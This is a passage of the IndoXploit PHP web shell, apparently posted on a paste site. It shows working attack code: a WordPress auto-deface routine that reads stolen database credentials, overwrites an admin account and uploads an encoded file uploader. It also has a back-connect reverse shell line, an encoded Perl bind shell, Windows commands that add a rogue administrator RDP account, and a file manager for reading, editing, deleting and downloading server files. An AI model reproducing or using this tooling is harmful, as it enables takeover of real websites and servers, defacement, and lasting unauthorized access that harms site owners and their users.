  1333. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1334. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1335. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1336. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1337. $data = curl_exec($ch);
  1338. curl_close($ch);
  1339. return $data;
  1340. }
  1341. $link = explode("\r\n", $_POST['link']);
  1342. $script = htmlspecialchars($_POST['script']);
  1343. $user = "indoxploit";
  1344. $pass = "indoxploit";
  1345. $passx = md5($pass);
  1346. foreach($link as $dir_config) {
  1347. $config = anucurl($dir_config);
  1348. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1349. $dbuser = ambilkata($config,"DB_USER', '","'");
  1350. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1351. $dbname = ambilkata($config,"DB_NAME', '","'");
  1352. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1353. $prefix = $dbprefix."users";
  1354. $option = $dbprefix."options";
  1355. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1356. $db = mysql_select_db($dbname);
  1357. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1358. $result = mysql_fetch_array($q);
  1359. $id = $result[ID];
  1360. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1361. $result2 = mysql_fetch_array($q2);
  1362. $target = $result2[option_value];
  1363. if($target == '') {
  1364. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1365. } else {
  1366. echo "[+] $target <br>";
  1367. }
  1368. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1369. if(!$conn OR !$db OR !$update) {
  1370. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1371. mysql_close($conn);
  1372. } else {
  1373. $site = "$target/wp-login.php";
  1374. $site2 = "$target/wp-admin/theme-install.php?upload";
  1375. $b1 = anucurl($site2);
  1376. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1377. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1378. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1379. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1380. $www = "m.php";
  1381. $fp5 = fopen($www,"w");
  1382. fputs($fp5,$upload3);
  1383. $post2 = array(
  1384. "_wpnonce" => "$anu2",
  1385. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1386. "themezip" => "@$www",
  1387. "install-theme-submit" => "Install Now",
  1388. );
  1389. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1390. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1391. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1392. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1393. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1394. curl_setopt($ch, CURLOPT_POST, 1);
  1395. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1396. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1397. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1398. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1399. $data3 = curl_exec($ch);
  1400. curl_close($ch);
  1401. $y = date("Y");
  1402. $m = date("m");
  1403. $namafile = "id.php";
  1404. $fpi = fopen($namafile,"w");
  1405. fputs($fpi,$script);
  1406. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1407. curl_setopt($ch6, CURLOPT_POST, true);
  1408. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1409. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1410. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1411. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1412. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  1413. $postResult = curl_exec($ch6);
  1414. curl_close($ch6);
  1415. $as = "$target/k.php";
  1416. $bs = anucurl($as);
  1417. if(preg_match("#$script#is", $bs)) {
  1418. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  1419. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1420. } else {
  1421. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1422. echo "[!!] coba aja manual: <br>";
  1423. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1424. echo "[+] username: <font color=lime>$user</font><br>";
  1425. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1426. }
  1427. mysql_close($conn);
  1428. }
  1429. }
  1430. } else {
  1431. echo "<center><h1>WordPress Auto Deface V.2</h1>
  1432. <form method='post'>
  1433. Link Config: <br>
  1434. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  1435. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
  1436. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1437. </form></center>";
  1438. }
  1439. } elseif($_GET['do'] == 'network') {
  1440. echo "<form method='post'>
  1441. <u>Bind Port:</u> <br>
  1442. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  1443. <input type='submit' name='sub_bp' value='>>'>
  1444. </form>
  1445. <form method='post'>
  1446. <u>Back Connect:</u> <br>
  1447. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  1448. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  1449. <input type='submit' name='sub_bc' value='>>'>
  1450. </form>";
  1451. if(isset($_POST['sub_bc'])) {
  1452. $ip = $_POST['ip_bc'];
  1453. $port = $_POST['port_bc'];
  1454. exe("/bin/bash -i >& /dev/tcp/$ip/$port 0>&1");
  1455. }
  1456. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  1457. if(isset($_POST['sub_bp'])) {
  1458. $f_bp = fopen("/tmp/bp.pl", "w");
  1459. fwrite($f_bp, base64_decode($bind_port_p));
  1460. fclose($f_bp);
  1461.  
  1462. $port = $_POST['port_bind'];
  1463. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  1464. sleep(1);
  1465. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  1466. unlink("/tmp/bp.pl");
  1467. }
  1468. } elseif($_GET['do'] == 'krdp_shell') {
  1469. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  1470. if($_POST['create']) {
  1471. $user = htmlspecialchars($_POST['user']);
  1472. $pass = htmlspecialchars($_POST['pass']);
  1473. if(preg_match("/$user/", exe("net user"))) {
  1474. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
  1475. } else {
  1476. $add_user = exe("net user $user $pass /add");
  1477. $add_groups1 = exe("net localgroup Administrators $user /add");
  1478. $add_groups2 = exe("net localgroup Administrator $user /add");
  1479. $add_groups3 = exe("net localgroup Administrateur $user /add");
  1480. echo "[ RDP ACCOUNT INFO ]<br>
  1481. ------------------------------<br>
  1482. IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font><br>
  1483. Username: <font color=lime>$user</font><br>
  1484. Password: <font color=lime>$pass</font><br>
  1485. ------------------------------<br><br>
  1486. [ STATUS ]<br>
  1487. ------------------------------<br>
  1488. ";
  1489. if($add_user) {
  1490. echo "[add user] -> <font color='lime'>Berhasil</font><br>";
  1491. } else {
  1492. echo "[add user] -> <font color='red'>Gagal</font><br>";
  1493. }
  1494. if($add_groups1) {
  1495. echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
  1496. } elseif($add_groups2) {
  1497. echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
  1498. } elseif($add_groups3) {
  1499. echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
  1500. } else {
  1501. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  1502. }
  1503. echo "------------------------------<br>";
  1504. }
  1505. } elseif($_POST['s_opsi']) {
  1506. $user = htmlspecialchars($_POST['r_user']);
  1507. if($_POST['opsi'] == '1') {
  1508. $cek = exe("net user $user");
  1509. echo "Checking username <font color=lime>$user</font> ....... ";
  1510. if(preg_match("/$user/", $cek)) {
  1511. echo "[ <font color=lime>Sudah ada</font> ]<br>
  1512. ------------------------------<br><br>
  1513. <pre>$cek</pre>";
  1514. } else {
  1515. echo "[ <font color=red>belum ada</font> ]";
  1516. }
  1517. } elseif($_POST['opsi'] == '2') {
  1518. $cek = exe("net user $user indoxploit");
  1519. if(preg_match("/$user/", exe("net user"))) {
  1520. echo "[change password: <font color=lime>indoxploit</font>] -> ";
  1521. if($cek) {
  1522. echo "<font color=lime>Berhasil</font>";
  1523. } else {
  1524. echo "<font color=red>Gagal</font>";
  1525. }
  1526. } else {
  1527. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  1528. }
  1529. } elseif($_POST['opsi'] == '3') {
  1530. $cek = exe("net user $user /DELETE");
  1531. if(preg_match("/$user/", exe("net user"))) {
  1532. echo "[remove user: <font color=lime>$user</font>] -> ";
  1533. if($cek) {
  1534. echo "<font color=lime>Berhasil</font>";
  1535. } else {
  1536. echo "<font color=red>Gagal</font>";
  1537. }
  1538. } else {
  1539. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  1540. }
  1541. } else {
  1542. //
  1543. }
  1544. } else {
  1545. echo "-- Create RDP --<br>
  1546. <form method='post'>
  1547. <input type='text' name='user' placeholder='username' value='indoxploit' required>
  1548. <input type='text' name='pass' placeholder='password' value='indoxploit' required>
  1549. <input type='submit' name='create' value='>>'>
  1550. </form>
  1551. -- Option --<br>
  1552. <form method='post'>
  1553. <input type='text' name='r_user' placeholder='username' required>
  1554. <select name='opsi'>
  1555. <option value='1'>Cek Username</option>
  1556. <option value='2'>Ubah Password</option>
  1557. <option value='3'>Hapus Username</option>
  1558. </select>
  1559. <input type='submit' name='s_opsi' value='>>'>
  1560. </form>
  1561. ";
  1562. }
  1563. } else {
  1564. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  1565. }
  1566. } elseif($_GET['act'] == 'newfile') {
  1567. if($_POST['new_save_file']) {
  1568. $newfile = htmlspecialchars($_POST['newfile']);
  1569. $fopen = fopen($newfile, "a+");
  1570. if($fopen) {
  1571. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  1572. } else {
  1573. $act = "<font color=red>permission denied</font>";
  1574. }
  1575. }
  1576. echo $act;
  1577. echo "<form method='post'>
  1578. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  1579. <input type='submit' name='new_save_file' value='Submit'>
  1580. </form>";
  1581. } elseif($_GET['act'] == 'newfolder') {
  1582. if($_POST['new_save_folder']) {
  1583. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  1584. if(!mkdir($new_folder)) {
  1585. $act = "<font color=red>permission denied</font>";
  1586. } else {
  1587. $act = "<script>window.location='?dir=".$dir."';</script>";
  1588. }
  1589. }
  1590. echo $act;
  1591. echo "<form method='post'>
  1592. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  1593. <input type='submit' name='new_save_folder' value='Submit'>
  1594. </form>";
  1595. } elseif($_GET['act'] == 'rename_dir') {
  1596. if($_POST['dir_rename']) {
  1597. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  1598. if($dir_rename) {
  1599. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1600. } else {
  1601. $act = "<font color=red>permission denied</font>";
  1602. }
  1603. echo "".$act."<br>";
  1604. }
  1605. echo "<form method='post'>
  1606. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  1607. <input type='submit' name='dir_rename' value='rename'>
  1608. </form>";
  1609. } elseif($_GET['act'] == 'delete_dir') {
  1610. $delete_dir = rmdir($dir);
  1611. if($delete_dir) {
  1612. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1613. } else {
  1614. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  1615. }
  1616. echo $act;
  1617. } elseif($_GET['act'] == 'view') {
  1618. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1619. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  1620. } elseif($_GET['act'] == 'edit') {
  1621. if($_POST['save']) {
  1622. $save = file_put_contents($_GET['file'], $_POST['src']);
  1623. if($save) {
  1624. $act = "<font color=lime>Saved!</font>";
  1625. } else {
  1626. $act = "<font color=red>permission denied</font>";
  1627. }
  1628. echo "".$act."<br>";
  1629. }
  1630. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1631. echo "<form method='post'>
  1632. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  1633. <input type='submit' value='Save' name='save' style='width: 500px;'>
  1634. </form>";
  1635. } elseif($_GET['act'] == 'rename') {
  1636. if($_POST['do_rename']) {
  1637. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  1638. if($rename) {
  1639. $act = "<script>window.location='?dir=".$dir."';</script>";
  1640. } else {
  1641. $act = "<font color=red>permission denied</font>";
  1642. }
  1643. echo "".$act."<br>";
  1644. }
  1645. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1646. echo "<form method='post'>
  1647. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  1648. <input type='submit' name='do_rename' value='rename'>
  1649. </form>";
  1650. } elseif($_GET['act'] == 'delete') {
  1651. $delete = unlink($_GET['file']);
  1652. if($delete) {
  1653. $act = "<script>window.location='?dir=".$dir."';</script>";
  1654. } else {
  1655. $act = "<font color=red>permission denied</font>";
  1656. }
  1657. echo $act;
  1658. } elseif(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  1659. @ob_clean();
  1660. $file = $_GET['file'];
  1661. @header('Content-Description: File Transfer');
  1662. @header('Content-Type: application/octet-stream');
  1663. @header('Content-Disposition: attachment; filename="'.basename($file).'"');
  1664. @header('Expires: 0');
  1665. @header('Cache-Control: must-revalidate');
  1666. @header('Pragma: public');
  1667. @header('Content-Length: ' . filesize($file));
  1668. readfile($file);
  1669. exit;
  1670. } else {
  1671. if(is_dir($dir) === true) {
  1672. if(!is_readable($dir)) {
  1673. echo "<font color=red>can't open directory. ( not readable )</font>";
  1674. } else {
  1675. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  1676. <tr>
  1677. <th class="th_home"><center>Name</center></th>
  1678. <th class="th_home"><center>Type</center></th>
  1679. <th class="th_home"><center>Size</center></th>
  1680. <th class="th_home"><center>Last Modified</center></th>
  1681. <th class="th_home"><center>Owner/Group</center></th>
  1682. <th class="th_home"><center>Permission</center></th>
  1683. <th class="th_home"><center>Action</center></th>
  1684. </tr>';
  1685. $scandir = scandir($dir);
  1686. foreach($scandir as $dirx) {
  1687. $dtype = filetype("$dir/$dirx");
  1688. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  1689. if(function_exists('posix_getpwuid')) {
  1690. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  1691. $downer = $downer['name'];
  1692. } else {
  1693. //$downer = $uid;
  1694. $downer = fileowner("$dir/$dirx");
  1695. }
  1696. if(function_exists('posix_getgrgid')) {
  1697. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  1698. $dgrp = $dgrp['name'];
  1699. } else {
  1700. $dgrp = filegroup("$dir/$dirx");
  1701. }
  1702. if(!is_dir("$dir/$dirx")) continue;
  1703. if($dirx === '..') {
  1704. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  1705. } elseif($dirx === '.') {
  1706. $href = "<a href='?dir=$dir'>$dirx</a>";
  1707. } else {
  1708. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  1709. }
  1710. if($dirx === '.' || $dirx === '..') {
  1711. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  1712. } else {
  1713. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  1714. }
  1715. echo "<tr>";
  1716. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  1717. echo "<td class='td_home'><center>$dtype</center></td>";
  1718. echo "<td class='td_home'><center>-</center></th></td>";
  1719. echo "<td class='td_home'><center>$dtime</center></td>";
  1720. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  1721. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  1722. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  1723. echo "</tr>";
  1724. }
  1725. }
  1726. } else {
  1727. echo "<font color=red>can't open directory.</font>";
  1728. }
  1729. foreach($scandir as $file) {
  1730. $ftype = filetype("$dir/$file");
  1731. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  1732. $size = filesize("$dir/$file")/1024;
  1733. $size = round($size,3);
  1734. if(function_exists('posix_getpwuid')) {
  1735. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  1736. $fowner = $fowner['name'];
  1737. } else {
  1738. //$downer = $uid;
  1739. $fowner = fileowner("$dir/$file");
  1740. }
  1741. if(function_exists('posix_getgrgid')) {
  1742. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  1743. $fgrp = $fgrp['name'];
  1744. } else {
  1745. $fgrp = filegroup("$dir/$file");
  1746. }
  1747. if($size > 1024) {
  1748. $size = round($size/1024,2). 'MB';
  1749. } else {
  1750. $size = $size. 'KB';
  1751. }
  1752. if(!is_file("$dir/$file")) continue;
  1753. echo "<tr>";
  1754. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  1755. echo "<td class='td_home'><center>$ftype</center></td>";
  1756. echo "<td class='td_home'><center>$size</center></td>";
  1757. echo "<td class='td_home'><center>$ftime</center></td>";
  1758. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  1759. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  1760. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  1761. echo "</tr>";
  1762. }
  1763. echo "</table>";
  1764. if(!is_readable($dir)) {
  1765. //
  1766. } else {
  1767. echo "<hr>";
  1768. }
  1769. echo "<center>Copyright &copy; ".date("Y")." - <a href='http://indoxploit.or.id/' target='_blank'><font color=lime>IndoXploit</font></a></center>";
  1770. }
  1771. ?>
  1772. </html>
Add Comment
Please, Sign In to add comment